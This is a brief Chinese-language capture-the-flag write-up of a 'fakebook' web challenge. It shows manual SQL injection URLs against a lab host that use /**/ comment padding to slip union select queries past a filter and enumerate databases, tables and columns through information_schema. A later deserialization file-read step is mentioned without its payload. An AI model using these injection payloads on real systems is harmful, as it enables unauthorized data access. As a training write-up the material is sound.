通过检测可以判断存在注入点可以进行注入,由于工具sqlmap过waf不太熟练下面手工进行注入。 通过order by 判断列为4,大于4或小于均4报错,因此判断此列为4: 经测试,发现此页面对字符进行了过滤http://111.198.29.45:58599/view.php?no=-1 /**/union/**/select 1,group_concat(schema_name),3,4 from information_schema.schemata --+ 获取到数据库:fakebook,information_schema,mysql,performance_schema,test 下面获取表:http://111.198.29.45:58599/view.php?no=-1 /**/union/**/select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema="fakebook"--+ 表名为users。 获取字段http://111.198.29.45:58599/view.php?no=-1 /**/union/**/select 1,group_concat(column_name),3,4 from information_schema.columns where table_schema="fakebook"--+ 获取字段信息,查看字段发现我们提交的数据被序列化: 猜想,是否可以在no=1注入处进行反序列化读取本地文件,反序列化语句构造: 查看源码: 获取到flag!!! 各位大佬不喜勿喷,小白一枚!希望能和各位大佬多多交流。 - End -